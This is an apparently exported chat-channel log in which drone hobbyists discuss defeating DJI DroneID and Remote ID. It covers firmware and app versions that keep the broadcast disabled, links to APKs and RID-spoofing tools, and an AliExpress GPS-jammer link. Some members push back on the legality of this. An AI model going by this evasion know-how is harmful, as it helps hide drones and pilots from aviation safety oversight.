those numbers could be earfcn like, where the frequency is a base plus the number times a raster
[2023-04-05 21:55:36]
aholtzma :
you'd need that to hit the 0.5 MHz raster that the droneid carriers seem to be on
[2023-04-08 07:00:24]
kennyx :
Hi, which firmware version would I need to downgrade to on Mavic Air 2 (vm231) in order to be able to use CJD with the privacy bits?
[2023-04-08 16:37:24]
oakley75 :
460 definitely works.
[2023-04-11 15:43:02]
blowfish448 :
blowfish448 joined the channel.
[2023-04-11 17:53:41]
dmtstarpilot :
Hi, does using JeepDoors show the drone's serial number on a Mavic 2?
[2023-04-12 21:59:18]
tissy :
JeepDoors "hides" certain DJI models' serial numbers from Aeroscope-based systems.
[2023-04-14 19:47:25]
jcase :
@tissy it's flawed for some devices
[2023-04-14 19:47:39]
jcase :
some firmwares on some devices will periodically ignore the privacy bits
[2023-04-14 19:48:04]
jcase :
others are known to reset the bits
[2023-04-14 19:55:29]
tissy :
Thank you @jcase. Absolutely, it was more of a correction to @dmtstarpilot's post that it "hides" a serial, not "shows" the serial ?
[2023-04-15 11:03:10]
dmtstarpilot :
Thank you for the information. The firmware on my mavic 2 zoom model is v01.00.0770.
[2023-04-19 12:54:11]
dji1278 :
dji1278 joined the channel.
[2023-04-19 15:34:48]
dainis.forums :
dainis.forums joined the channel.
[2023-04-19 16:55:42]
k_k :
kulkraus joined the channel.
[2023-04-20 23:21:22]
rec00rsiff :
rec00rsiff joined the channel.
[2023-04-21 14:11:49]
oxkotb :
oxkotb joined the channel.
[2023-04-21 17:12:23]
gudvin :
I heard that on the Mavic 3T you can disable the GPS of the remote by installing the RC Pro firmware (rm510b). Does anyone know how to do this?
[2023-04-21 18:57:30]
sambuko :
It's very easy to use a GPS jammer
Like in the photo
[2023-04-22 10:22:50]
coldflake :
Do you have a link for it?
[2023-04-22 11:02:21]
ekate :
ekate joined the channel.
[2023-04-22 20:24:16]
sambuko :
Yes. you can find it on aliexpress or Taobao.
[2023-04-22 20:26:51]
sambuko :
https://a.aliexpress.com/_DnBInz7
[2023-04-23 12:40:53]
torich :
torich joined the channel.
[2023-04-25 10:23:09]
supertester :
supertester joined the channel.
[2023-04-26 14:41:45]
icanstillfly :
icanstillfly joined the channel.
[2023-04-26 20:43:07]
uskve :
"Further, during our security analysis, we found a publicly
unknown DUML command that seemed to allow configuring
and disabling the different DroneID values. According to DJI,
this command is part of an internal API that should not be
available externally. This has been fixed in the latest model.
Using our live DroneID decoder, we could confirm that this
command does not disable the DroneID packets but replaces
the respective values within the packet with the value ‘fake’."
https://www.ndss-symposium.org/wp-content/uploads/2023/02/ndss2023_f217_paper.pdf
[2023-04-26 20:43:10]
uskve :
interesting...
[2023-04-26 22:42:03]
konraditurbe :
Yeah, that command was revealed in this channel a few years ago.
[2023-04-27 05:47:20]
theminer :
theminer joined the channel.
[2023-04-27 14:19:47]
theminer :
Hi, I'm a newbie here. My Mini SE is on 01.00.0000 firmware. Am I right that if CIA Jeep Doors shows the DroneID status as disabled, my SE will not broadcast a beacon that will show information about my drone and its pilot on AS-based programs? Or does Aeroscope now have another way to detect it without the DroneID broadcast?
Thank you so much.
[2023-04-27 14:26:04]
theminer :
I am a citizen of Ukraine in Sumi and will use this drone to check around in many situations. So for me it's really a safety reason. Thank you guys so much and forgive me for my bad English tho.
[2023-04-27 14:28:06]
efimato_re :
Which Aeroscope are you asking about? The civil version, or the G-mnt one?
[2023-04-27 14:29:19]
theminer :
Both, maybe. I don't know which exactly the Russians use to find the location of the drone operator.
[2023-04-27 14:50:07]
konraditurbe :
Hi, you should not rely solely on the output of CIAJD, since the firmware could return a valid response and not actually turn off the broadcast. The tool was tried and tested with different ACs, but those are Mavic 3/Air2S etc. on older FW versions, prior to April 2022. If you're a civilian, I'd advise you not to fly it, as the drone could draw attention to you. Drones which have been hacked with CIAJD do appear on Aeroscope receivers, but the operators will see blank coordinates for pilot and drone (0.0000,0.0000).
[2023-04-27 14:57:24]
theminer :
thank you so much for your advice. then i think i will just not fly it.
[2023-04-27 15:07:50]
efimato_re :
@konraditurbe
> Drones which have been hacked with CIAJD do appear on Aeroscope receivers
if you switch to map view, will the drone mark still move over the map, even if coords were scrambled with CIAJD?
Where do these coords come from then?
[2023-04-27 15:11:38]
konraditurbe :
Nothing appears on map. Here's a video from the occupiers showing how different drones appear: https://twitter.com/faineg/status/1602690997082882048
[2023-04-27 15:49:16]
theminer :
Thank you so much for information.
[2023-04-27 17:41:39]
theminer :
From what I tried in my basement, it seems like firmware version 01.00.0000 on the Mini SE didn't re-enable the Drone ID flag after it was disabled by CIAJD. But all the fly apps that are compatible with Android 13, both Litchi 4.26.2 and DJI Fly 1.6.12, did re-enable the flag as soon as they connected to the drone.
So it can only be used with an older Android phone.
[2023-04-28 08:35:53]
baxove :
That's correct, DJI Fly 1.5.10 is the latest version that does not re-enable flags when connecting to the drone. I also have an Android 13 phone, but I use a dedicated phone with Android 12 in offline mode for flying so that I can use DJI Fly 1.5.10 with my Mini 2 (fw 01.03.0000). Flags do not re-enable, so I really hope it works, but I do not have an Aeroscope to test it.
[2023-05-03 04:28:29]
lepuss :
lepuss joined the channel.
[2023-05-03 05:24:18]
sawman :
sawman joined the channel.
[2023-05-03 05:36:54]
sawman :
@sawman left the channel.
[2023-05-03 09:16:57]
dongmou :
dongmou joined the channel.
[2023-05-03 13:18:00]
baxove :
From what I understand, CIAJeepDoors disables the DroneID broadcast (for certain DJI models and firmware) to Aeroscopes only. However, I am unsure if there are other detection systems out there and, if so, how common are they and what type of information are they able to detect? I have tried to search for this information on the internet, but could not find anything.
[2023-05-03 18:17:08]
bitbangingbytes :
Bluvec
[2023-05-03 18:17:40]
bitbangingbytes :
https://bluvec.com/
[2023-05-03 19:32:15]
bitbangingbytes :
That's specifically protocol decoding, then there are other systems such as RF direction finding that work regardless of CIAJEEPDOORS or not
[2023-05-03 19:33:10]
bitbangingbytes :
SkyCope, MyDefense, DeDrone and others
[2023-05-03 19:33:21]
bitbangingbytes :
For RF Direction finding
[2023-05-04 06:42:27]
baxove :
Interesting. Can these systems also detect the position and altitude of the drone? And how about the pilot's position if the RC and the phone are offline?
[2023-05-04 07:25:47]
enigma2 :
there are 2 things :
1. if a company has decoded the entire protocol, now it's possible to intercept the pilot position from the uplink (the RC sends it ;-) ) and the drone location from the downlink (the info you are seeing in DJI GO). It does not need the droneid packets that have been designed only for aeroscope. (CIAjeepdoor is only for disabling droneid)
2. if you have not decoded the protocol and the droneid is disabled, you can still DoA (direction of arrival) the uplink signal and find the pilot direction (not exact position).
[2023-05-04 08:52:57]
baxove :
Oh, I see. So basically people will always be able to see where I am flying. Thanks for your answers
[2023-05-05 00:07:06]
bitbangingbytes :
If you want them to not see you, then you need a setup where the drone flies autonomously and you aren't blasting out RF control signals.
They can still track the drone via other means, but your own position won't be easily identifiable
[2023-05-05 00:37:34]
oakley75 :
Yep, because you can then just turn off the RC. As long as they don't visually see it.
[2023-05-05 01:33:35]
johnnokomis :
How is this going to be handled when the drone is being flown over the internet? Using the DJI dock the M30 can now be flown this way. I assume additional Enterprise drones will soon be added. In the countries where the 4G dongle already works what does it broadcast for a location? AFAIK, RID is still active outside the US.
[2023-05-05 17:53:42]
theminer :
Regarding CIAjeepdoors, are there any problems if I switch from RC-N1 to DJI RC?
[2023-05-05 17:58:56]
konraditurbe :
Make sure the app is 1.5.10 or lower on both.
[2023-05-05 21:39:04]
cloudwerx :
DAMNIT! I was all good and happy, had my Mavic 2 Pro all souped up, DH cert working, CIAJD working great, and then I went ahead and updated as I figured, since DH was recommending it, it wouldn't break anything, but now CIAJD is showing 01011111 :-( Did they change the RSA key or something? DUML disabled, or did they shuffle around the bits? I went from 770->790 FW
[2023-05-05 21:40:35]
cloudwerx :
Still got the MP1 for covert missions but man, I should know better
[2023-05-06 12:16:00]
jay :
jay joined the channel.
[2023-05-07 11:52:16]
lolo780 :
Fuck DJI. If an update says update flight safety with nothing else, do not upgrade.
[2023-05-07 13:52:06]
jcase :
don't rely on CIAJD as a bypass for AS; some drone firmwares are bugged and will on/off ignore the settings
[2023-05-08 13:38:47]
cloudwerx :
it appears everything else works on .790, the DH cert hack works, FCC Boost, editing params... Does anyone have an idea of what DJI did in order to break the CIAJD hack? Think this is something that is permanently "fixed" or is it just a matter of changing the DUML commands? fuck DJI! I hate the fact that my location is broadcast in realtime, such an invasion of privacy, and the fact I can't turn it off, and did not sign up for this, should be illegal. I am not trying to fly my drone over area-51, or race jet liners, just want privacy while I take neat videos and photos of nature. I can go buy an assault rifle and legally carry it around, I can even carry a sword around in my State, but people think my drones are such a threat it's crazy.
[2023-05-08 13:45:15]
joonas :
they patched it properly. modifying DUML is not going to get you anywhere. and eh, i don't like it either, but it's in fact illegal for DJI to sell you a drone w/o rid or one that lets you disable it. so your only other option is to start building your own.
[2023-05-08 21:02:58]
dkovar :
You did sign up for "this" when you accepted the DJI EULA when you first turned on your drone.
And as of September, any drone sold in the U.S. is required to broadcast Remote ID data unless you are flying in a FRIA or if you are flying a drone that is not required to be registered (i.e., recreational and under 250g).
RemoteID is problematic and I'll not be surprised if there are court challenges relating to privacy after September.
[2023-05-10 04:52:17]
theminer :
Is it true that a Mini 3 Pro with original firmware 01.00.0100 is able to disable DroneID via a modded DJI RC which sends some command to disable the DroneID bit? Someone offered me this service; I just want to know if it is really possible.
[2023-05-10 06:39:39]
eddy :
I'm afraid this is not possible on newer drones. It's probably possible to enable: "disable remote control localization" Correct me if I'm wrong.
[2023-05-10 07:12:32]
coldflake :
It is possible but only for older firmware, like the one you mentioned
[2023-05-10 07:25:49]
konraditurbe :
Which app version would one use for this? Past 1.5.10 it sends enable droneID command. And 1.5.10 is not compatible with DJI RC?
[2023-05-10 07:33:31]
eddy :
It should also work with the latest apk, provided you use the mentioned hack.
[2023-05-10 07:34:47]
konraditurbe :
Which hack is this?
[2023-05-10 07:35:11]
eddy :
"Sincoder" for DJI RC
https://mavicpilots.com/threads/some-guy-doing-an-fcc-hack-permanent-for-rc-pro-controller.133836/
[2023-05-10 13:01:24]
dereksynkopa :
Droneid is one problem, but what about RemoteID over wi-fi? Does the hack disable it too? I'll check it today and let you know. Until now my mini 3 pro was still visible in the drone scanner app.
[2023-05-10 13:25:49]
joonas :
the fws that let you disable over DUML only supported DJI's custom droneid, and any new builds with official RemoteID don't have the DUML functionality anymore. at least as far as i know, but someone else should confirm this.
[2023-05-10 16:30:25]
eddy :
@dereksynkopa :: RemoteID is OFF, @coldflake DroneID it seems is ON (not verified on AS).
Tested with Mini3Pro fmw = 01.00.0100, with and without apk 1.9.1 /patched/, DJI RC ..
[2023-05-10 17:00:19]
coldflake :
@eddy Sorry, I read it as Mavic 3, not mini 3...my bad
[2023-05-10 17:59:42]
dereksynkopa :
Unfortunately, my test does not confirm the operation of the DroneID hack. I have firmware 01.00.0100 in the drone, 01.02.0300 in the RC, Apk 1.9.1. The drone scanner application easily gives the position of the drone and its serial number, which is included in the RemoteID. The LED on / LED off commands work, so part of the hack seems to work. Maybe I'm doing something wrong?
[2023-05-10 18:12:38]
eddy :
Good question, I don't know. I last had RemoteID active with apk 1.6.1 ++ RC= 01.00.0200 ..
Now it is OFF. But the FCC hack will probably change the country. Isn't that the key?
[2023-05-10 23:51:05]
cloudwerx :
Do we know what version of DJI GO and/or Litchi started enabling DroneID when used? This is for Android btw
[2023-05-11 09:50:42]
oxolot :
dji.go.v5_1.6.1-3051774
[2023-05-12 09:06:55]
ant :
ant joined the channel.
[2023-05-14 11:24:55]
joelg :
joelg joined the channel.
[2023-05-16 14:29:44]
retrocall :
yes
[2023-05-16 14:51:02]
eddy :
What does AS say?
[2023-05-17 14:59:51]
pingspike :
has anyone tried to enable Drone ID in countries where it's disabled by default? (eg. UK)
[2023-05-18 05:31:15]
enk2022 :
which dji ocusync drone has a serial number starting with 68?
[2023-05-18 11:44:46]
sparkyws :
I have managed to activate it in the UK on a Mini 3 Pro by using fake GPS. It's a bit hit and miss, but once enabled it stays active for some time (not sure why), but I need to do some more testing
I did it so I can test RID receivers and apps
[2023-05-18 16:54:09]
tmbinc :
btw does RID have encryption? I was glancing over mini 2 code recently that added RID and they do some random crypto
[2023-05-18 16:54:22]
tmbinc :
... and is japanese RID the same as global RID?
[2023-05-18 19:05:40]
dkovar :
RID in the U.S. is not encrypted by design.
[2023-05-19 02:14:35]
nmikus :
I think the Japanese version has some signature thing in it
[2023-05-19 16:17:23]
the_lord :
Mini 3
[2023-05-21 07:12:05]
joelg :
what version of litchi can i use to keep remote id disabled
[2023-05-21 10:39:46]
asdrubale :
release 4.25 for android remains disabled..... with 4.26 drone-id will be visible
[2023-05-21 21:32:50]
joelg :
Thanks, anyone have the apk?
[2023-05-22 05:14:14]
oakley75 :
I've got 4.19beta as my personal last one before 4.26. Extracted from my own install. I'll update if I find something newer.
[2023-05-22 11:44:43]
joelg :
I found 4.25 on a sus looking website but seems to be alright
[2023-05-22 12:31:35]
oakley75 :
Have you looked at it on a rooted phone/emulator using something like Permission Manager X, to see if any (bad) permissions were added?
[2023-05-22 13:19:34]
coldflake :
@joelg If your impression of the website is that it is sus, then stay with that and don't install that app.
Without having the original APK to do an MD5 comparison on, you can not even remotely tell if it is alright or not.
Those who make sus websites need people to think it is ok even though it screams to the heavens that it is not ;)
[2023-05-22 14:21:59]
oakley75 :
I have far more older versions than recent ones, but here are my latest Litchi. Extracted from an official install. I don't think obb should be an issue, but the phone was not rooted when these were extracted. 4.26_beta is included here in the slim case that the beta may still be ID safe. 30 days before the uploads delete.
Litchi v4.19.0_BETA-g (77.2MB)
MD5: 9433ae3ab6409053a38fb1e1718d15c0
https://ufile.io/eypvrd91
Litchi v4.26.0_BETA-g (62.0MB)
MD5: 0bcfbbffc2c4145967cc71e710e209c1
https://ufile.io/tem3plib
[2023-05-23 11:30:51]
joelg :
Phone is just an old Samsung I don't care about, and the website was called happymod. I have been hesitant to use it with the drone
[2023-05-23 11:31:29]
joelg :
Thanks I will give those a try
[2023-05-23 11:36:00]
joelg :
Looks like I need v4.20 or higher to be compatible with my Air2s, so I'll try 4.26 and see if it resets drone id
[2023-05-23 12:42:30]
nz-maori :
It will do so
[2023-05-23 21:04:04]
iz_zi :
iz_zi joined the channel.
[2023-05-27 05:21:40]
drmsucks :
drmsucks joined the channel.
[2023-05-27 14:16:45]
lishujian3 :
lishujian3 joined the channel.
[2023-05-30 10:00:41]
qgig :
qgig joined the channel.
[2023-05-31 22:14:03]
nicksapienza :
nicksapienza joined the channel.
[2023-06-01 06:35:11]
cloudwerx :
here is Litchi 4.25, right from Litchi, https://flylitchi.com/apks/30004310.apk
[2023-06-01 15:20:28]
oakley75 :
Funny, bought my license back when it was like 8 bucks for a P2V+, and never knew that he hosted these, thanks a million. Know how we could access the apk directory directly and look around?
edit: I see the 4.25 link in the Litchi forum, awesome find! Frankly didn't know there was a specific Amazon Store version, weird.
[2023-06-01 23:55:13]
cloudwerx :
yep that's where I found it, got lucky! I tried a few methods to figure out if I could get the other ones, but no luck yet, but have another idea I will be trying in a bit.
[2023-06-02 02:24:45]
oakley75 :
Well I can say for certain that 4.26 is 30004360, and we know 4.25 is 30004310. Number went up by 50 between a minor revision.
[2023-06-05 19:47:41]
tolma4 :
tolma4 joined the channel.
[2023-06-05 21:16:09]
alt.nq-5711k93 :
Hello, has anyone already tried to patch latest version of DJI Fly app to avoid DroneId reset ?
[2023-06-05 22:14:56]
uskve :
You would need to unpack it first
[2023-06-05 22:25:46]
cloudwerx :
https://www.dhgate.com/product/portable-counter-drone-device-for-stopping/803315894.html?d1_page_num=1&dspm=pcen.sp.list.4.eSKHOmxvCv7S3Go1zel3&resource_id=803315894&scm_id=search.LIST..@.prerank001|3|0|esm2|7_5|ER-B|newes|7_5.newC.#s1-2-1;searl|2441391829:3
[2023-06-05 22:26:45]
cloudwerx :
not bad for $100,000
[2023-06-05 22:27:03]
cloudwerx :
bet you could do some other fun shit with that thing
[2023-06-06 00:16:31]
alt.nq-5711k93 :
Yes I saw, secneo protection, it's gonna be fun !
[2023-06-06 01:05:26]
stanlee :
Here's one for $29k... But wait! If you buy 5 or more, each one drops to $28k!
[2023-06-06 01:05:27]
stanlee :
https://www.dhgate.com/product/portable-jam-ming-and-blo-cking-uav-drone/812330365.html?dspm=pcen.pd.alsobuy.3.z1Jxe8Ay3rVkDTPIbvPc&resource_id=812330365&scm_id=rec.yml..._pcpdymlcppd_1to2_related_pcpdymlcppd_fm-jfy-filter_2001_null_greenScreenFlag_0.31880001938460734.#pcpdymlcppd-3-5|null::r6129471023
[2023-06-06 15:15:43]
benoit :
benoit joined the channel.
[2023-06-07 07:39:46]
jcase :
i have both unpacked and patched it, but not for droneid reset; patching the modem itself is a better route.
[2023-06-07 10:02:53]
sappy :
sappy joined the channel.
[2023-06-07 21:00:54]
alt.nq-5711k93 :
why not remove (or "nop") the part where the droneid reset to 1 is sent to the drone ?
[2023-06-07 21:06:55]
alt.nq-5711k93 :
On Mini2, using CIAJeepdoors to set droneid to 00000000 at the beginning of each test :
- using an old version (<=1.5.10) droneid isn't modified (always set to 00000000), but if you go to the Aeroscope menu and deactivate all options you get droneid set to 01011111
- using a recent version, droneid is modified
[2023-06-08 07:50:24]
the_lord :
In 2019 it was less than 10K USD
[2023-06-08 10:18:19]
jcase :
you still have to unpack it before you can nop anything
[2023-06-08 10:18:34]
jcase :
CIAjeepdoors is an incomplete solution and should not be relied on
[2023-06-08 17:12:09]
konraditurbe :
Do you mean incomplete solution because it still broadcasts a signal (but with Null data)?
[2023-06-08 21:37:44]
jcase :
that and because it does not always cause it to broadcast with null data on certain firmwares/drones
[2023-06-08 21:38:15]
jcase :
one example, some P4 firmwares will sporadically ignore the privacy bits and broadcast complete data
[2023-06-08 21:39:05]
jcase :
i did not track down the bug that caused that, nor did i verify what all firmwares or devices are impacted; it's a DJI bug for sure and wasn't what i was researching
[2023-06-08 21:39:11]
jcase :
but i did verify it
[2023-06-09 06:59:21]
tmbinc :
So you're rather ripping out the drone ID handler in the modem firmware?
[2023-06-09 10:47:18]
jcase :
depends on drone model, but yes, some via modem, some via other parts of firmware. I'm unaware of any other method that actually works
[2023-06-09 17:04:24]
bitbangingbytes :
Have any other detailed photos been posted anywhere?
[2023-06-10 07:59:19]
the_lord :
I took several photos for the jamming modules and the antenna when I disassembled it
[2023-06-10 22:49:15]
blablabrscht :
blablabrscht joined the channel.
[2023-06-12 02:24:29]
bitbangingbytes :
Can you share them? I have a Reverse Engineering wiki, would be cool to post them there. wiki.recessim.com
[2023-06-12 23:22:26]
fredmicrowave :
Looks like a Dual Ridged antenna
[2023-06-18 14:17:06]
tstotch :
tstotch joined the channel.
[2023-06-19 23:26:03]
martymcfly :
martymcfly joined the channel.
[2023-06-20 07:39:13]
the_lord :
These are all the pictures I could find
[2023-06-21 11:29:43]
the_lord :
Does anyone have the Aeroscope mobile CrystalSky FW update file?
[2023-06-21 12:30:10]
tissy :
The FW to enable the mapping API again?
[2023-06-21 12:36:20]
jcase :
lol yeah they stopped paying their mapbox bill
[2023-06-21 12:36:25]
jcase :
switched to maptiler
[2023-06-21 12:36:35]
jcase :
it's even better, they are caching the tiles on their own server
[2023-06-21 12:36:41]
jcase :
so they can see what map you are looking at now
[2023-06-21 12:36:48]
jcase :
well, at least in DJI fly
[2023-06-21 12:37:04]
jcase :
i haven't unpacked the newest AS apk
[2023-06-21 13:29:51]
the_lord :
yes indeed
[2023-06-21 13:31:14]
the_lord :
it's a customer's AS and I need to solve his problem
[2023-06-21 13:37:10]
dkovar :
I have it, somewhere. Let me find it for you.
[2023-06-21 13:41:24]
the_lord :
appreciated, thanks :)
[2023-06-21 13:41:41]
the_lord :
as you know I don't need it for myself ;)
[2023-06-21 19:46:12]
tissy :
Did you get the file @the_lord , if not I have it here.
[2023-06-21 21:29:26]
the_lord :
Send it please
[2023-06-22 12:01:51]
sparkyws :
RID spoofing ?
https://github.com/jjshoots/RemoteIDSpoofer
[2023-06-22 20:21:29]
vladho :
vladho joined the channel.
[2023-06-25 16:35:48]
tstotch :
Can that help with privacy and staying undetected when flying on your own?
[2023-06-25 18:32:44]
konraditurbe :
Is there a law against fake RID emissions? Just make so many that your drone looks like one of them on the Aeroscope screen.
[2023-06-25 19:47:29]
tstotch :
Aeroscope itself is being canceled anyway because of the new RID standard
[2023-06-25 23:08:52]
jcase :
@konraditurbe yes it is in the US
[2023-06-25 23:09:09]
jcase :
@tstotch it is not cancelled, in fact new hardware is in beta testing now
[2023-06-25 23:09:29]
jcase :
and there is no way to fly a drone remotely while being undetected
[2023-06-25 23:13:18]
jcase :
They seem to keep flip flopping, but latest signs show they are not done
[2023-06-25 23:13:38]
jcase :
Remote ID and DroneID serve two different purposes, which you can see in the design
[2023-06-26 15:19:52]
tstotch :
https://www.theverge.com/2023/3/5/23626057/dji-discontinues-aeroscope-drone-detecting-system
https://www.skylock1.com/blog/how-will-the-discontinuation-of-djis-aeroscope-system-impact-airport-security/
https://petapixel.com/2023/03/06/aeroscope-discontinued-dji-pulls-the-plug-its-drone-detection-system/
it very much is discontinued
[2023-06-26 17:14:43]
jcase :
@tstotch after the publication of all 3 of those articles DJI has a) shipped firmware supporting an AS hw upgrade, b) shipped beta testers that hardware, and c) I've managed to acquire a new order of units. I'm quite confident that it is not fully discontinued.
[2023-06-26 17:14:43]
jcase :
@tstotch after the publication of all 3 of those articles DJI has a) shipped firmware supporting an AS hw upgrade, b) shipped beta testers that hardware, and c) approved a purchase order for us of new AS units ... I think those articles are wrong
[2023-06-26 17:14:43]
jcase :
@tstotch after the publication of all 3 of those articles DJI has a) shipped firmware supporting an AS hw upgrade, b) shipped beta testers that hardware. I'm quite confident that it is not fully discontinued.
[2023-06-26 17:15:46]
jcase :
They have made it quite difficult to buy right now, and I'm told that is related to the war in ukraine.
[2023-06-26 17:18:29]
jcase :
Their former attorney's assessment is moronic. FAA Remote ID is irrelevant; the purpose of RID is close notification, the purpose of AS is distant notification. Until the FAA approves a long range protocol, it's not going to replace AS at all.
[2023-06-26 17:45:25]
dkovar :
Remote ID is also not secure and can be spoofed, making it hard for defenders to depend on.
[2023-06-26 18:29:36]
konraditurbe :
Well... https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie
[2023-06-26 19:15:57]
jcase :
and the AS will tell you it is being broadcast over wifi. ESP based spoofs are mostly identifiable, and short range
[2023-06-26 19:16:26]
jcase :
drone id is pretty trivial to spoof on wifi as well, my main gripe on remote id is that it is short range
[2023-06-26 19:34:13]
tstotch :
which is exactly what I'm counting on
[2023-06-26 19:37:59]
tstotch :
has anyone tried spoofing on a mini 3 yet?
[2023-06-26 19:44:44]
jcase :
spoof on a drone? or spoofing the drone?
[2023-06-26 19:45:02]
jcase :
and im not sure why you would want to spoof off the drone itself?
[2023-06-27 03:29:35]
harryyy :
harryyy joined the channel.
[2023-06-27 08:04:49]
rachfly :
Do you have any published information on that matter? how are you so sure?
thanks
[2023-06-27 08:51:07]
konraditurbe :
https://www.faa.gov/uas/getting_started/remote_id
[2023-06-27 11:42:59]
rachfly :
I'm sorry, my previous question in a comment was supposed to be for these claims. do you have any link to published information about it? Thanks.
Any info about new Aeroscope ?
[2023-06-27 18:12:26]
jcase :
@amirach for a) yes, they published the newest firmware, which contains the support for a new hw upgrade, for b) im unable to share anything on
[2023-06-28 03:40:18]
bitbangingbytes :
Funny, when I asked the DJI sales people internally, they said multiple times AS was going away and there was no replacement. Also said they eliminated the product managers working on AS.
[2023-06-28 03:41:33]
bitbangingbytes :
But they seem to be an organizational shit-show so wouldn't be surprised if they released a V2 AS
[2023-06-28 09:44:45]
jcase :
there was speak of a v2, i question if this update eliminates v2
[2023-06-28 10:06:33]
konraditurbe :
What's the point of FAA RID (1km range) if AS still has to exist? Did FAA just make it so people could rat out a drone they saw to nearby police? Don't get it, thought the law would just be 1km range and not more.
[2023-06-28 11:29:15]
jcase :
there are near infinite safety reasons for something like RID. RID exists as an open standard, and is mandated for most drone companies. DJI owns AS and would either deny usage of it, or require licensing
[2023-06-28 12:02:29]
tstotch :
RID and AS themselves are very much a good thing for safety reasons
[2023-06-28 12:02:50]
tstotch :
the problem is when it's abused to needlessly restrict people who are no danger to anyone anyway
[2023-06-28 14:29:42]
tissy :
Is the firmware update just for the CrystalSky @jcase or the SDR too?
[2023-06-28 15:57:15]
jcase :
How does the existence restrict anyone? They are non restrictive technologies.
[2023-06-29 11:07:04]
dkovar :
RID and DroneID limit some people's ability to fly without being observed. They are perceived as infringing on their privacy or liberties.
[2023-06-29 11:20:43]
tmbinc :
In most jurisdictions, the concept of using airspace, even above your own grounds, without regulation does not exist. So to be clear - are we talking about places where airspace is really unregulated, or about places where airspace is regulated but people just wish it wouldn't be?
In the latter case, that seems to be an issue that should be fixed on the political/legal side first, otherwise the argument boils down to "I want to break the law but don't want to get caught". Yes, there are privacy implications of regulating airspace, and if you're unhappy with the tradeoff, it seems the right course of action would be to lobby for a law change.
[2023-06-29 11:21:31]
tmbinc :
I think there's a huge difference between "I want to do something that DJI doesn't allow me to do" vs. "I want to do something that I'm legally not allowed to do". I'm very happy to help with the first (because fighting large corporations etc.), but not very happy with the second.
[2023-06-29 11:45:05]
dkovar :
The entire National Airspace (NAS) is regulated.
There are certainly people who want to break the law and not get caught. I think we generally aren't hearing from them.
Then there are those who think the regulations are stupid or invasive. They probably aren't violating the law or regulations and, because they are compliant, should not be subject to surveillance. I understand this point of view but feel that the NAS cannot operate on "Trust me, I'm not doing anything clueless, careless, or criminal."
We'd have an easier time making the argument for RID if the data was only available to people with a legal interest in the location of the drone and operator. Since anyone using a mobile phone app can potentially identify the operator's location RID does feel like an invasion of privacy as implemented.
[2023-06-29 11:49:05]
joonas :
if the law requires surveillance how are they being compliant when they are trying to avoid said surveillance? it's a "i know there's a requirement, but trust me bro, i fly safe so i should be exempt" situation in reverse.
[2023-06-29 11:50:25]
joonas :
not saying the laws are sane or the people who write them are particularly smart. but tmbinc's point stands - these people should be pestering their lawmakers, not asking people to help them break laws because "trust me bro. and the law is stupid anyway".
[2023-06-29 11:51:38]
joonas :
of course sometimes hackers also do deal with "the law is stupid" situations. but i think it's only fair to ask that others respect any boundaries people are setting there.
[2023-06-29 12:20:04]
dkovar :
Oh, I agree with you both - should go talk to their law makers. But speaking as someone who was somewhat involved in the RID process and who works with the US government, your average civilian has zero chances of fixing the laws.
RID is really badly implemented. I fear that abuse of RID data will result in legal challenges that could shut it down. Replacing it with something better designed would take years.
[2023-06-29 16:37:16]
bitbangingbytes :
What's badly implemented about RID?
[2023-06-29 17:19:58]
dkovar :
This is what I wrote up for a LinkedIn post a few weeks ago:
"Remote ID is fundamentally, perhaps fatally, flawed. Confidentiality, integrity and availability - the CIA Triad - Remote ID doesn't require any of these.
<insert image of guy at table in a park with sign that says "Prove me wrong".>
The CIA Triad is a foundational model for information security that is taught to everyone involved that learns about infosec.
Confidentiality - everything is broadcast in the clear over the air. Legitimate operators will be confronted by members of the public that feel that their legal operations are in some way illegal or offensive.
Integrity - there is no authentication mechanism, anyone can fill the fields with whatever data they wish. It can and will be spoofed, causing operators, the public, and LE to not trust the system.
Availability - it uses Bluetooth, transmission hardware and software lacking requirements, and depends on whatever Bluetooth implementation and platform the receiver possesses. If there is something wrong with the Bluetooth on an officer's phone, they'll perceive that a drone is not broadcasting when it might actually be complying.
We may have a very expensive roll out, a discovery that the requirements and implementation are flawed, failures to investigate and prosecute non-compliant operators, and once again be years behind a system for reliably identifying UAVs operating in the NAS."
[2023-06-29 19:24:04]
quad_fan :
To be complete: it's not accurate to say it uses Bluetooth. Implementation can be BT OR WiFi (via Beacon or NAN) - manufacturer's choice.
[2023-06-29 21:19:15]
tmbinc :
Stupid question maybe, but: Is RID purely sent by the UAV or by the Pilot's equipment? Cause I'm seeing code that forwards RID packets to the ground station ("vt_gnd") but it's possible I'm misunderstanding the code.
[2023-06-29 21:37:00]
dkovar :
Purely by the UAV but I can see why a vendor might send the same information to the ground station. And there was a proposed version that would require the ground station to transmit the information rather than the drone, so maybe that is legacy code? Interesting.
[2023-06-30 11:28:00]
jcase :
I think they are flawed, but not in the way of privacy
[2023-06-30 11:28:11]
jcase :
i mean RID has a very short range
[2023-06-30 11:28:25]
jcase :
and none of them are really pushing confidential info
[2023-06-30 14:47:48]
tstotch :
I was referring to cases like "I wanna cruise in my own backyard/garden and house" or "it's a great morning in the park and no one is around, i wanna record myself skating" or "the skyline looks nice with this sunset, let's just quickly climb to 20m for a shot and get down again"
[2023-06-30 14:48:53]
tstotch :
not cases like "oh, looks like my ex got her window open again. time to take a peek!" or "lol, think I'll go fly to the supermarket 2km away from my home and cruise around above the street there"
[2023-06-30 14:50:29]
tstotch :
the law doesn't differentiate there in my country. Any kind of flying in cities is criminalized unless you have explicit written permission from the local government. Which you only get if you work in a job that makes use of a camera drone
[2023-06-30 14:52:18]
tstotch :
put another way: in the eyes of the law, you wanting to cruise around in your own garden a little is put on the exact same level of crime as your idiot coworker who flies his drone around a train station or a hospital
[2023-06-30 14:57:07]
tstotch :
and let's be real here: if you really want to screw around people or whatever, you don't need to buy a DJI drone for 600-1000€. You buy a Cetus Pro kit for 300€ and go with that. Also has a camera through which you can see stuff
[2023-06-30 14:57:48]
tstotch :
in fact, if your goal is to screw around and be an idiot, a Mavic or Mini would be far too expensive for the risk of having it taken away
[2023-06-30 15:04:02]
tstotch :
that's still a very legitimate fact and desire. I fail to understand how people can genuinely question the basic and simple wish for privacy and associate it with the desire to break the law
[2023-06-30 15:04:58]
tstotch :
no one needs a special reason to wish for privacy. "none of your business" is reason enough
[2023-06-30 15:10:40]
tstotch :
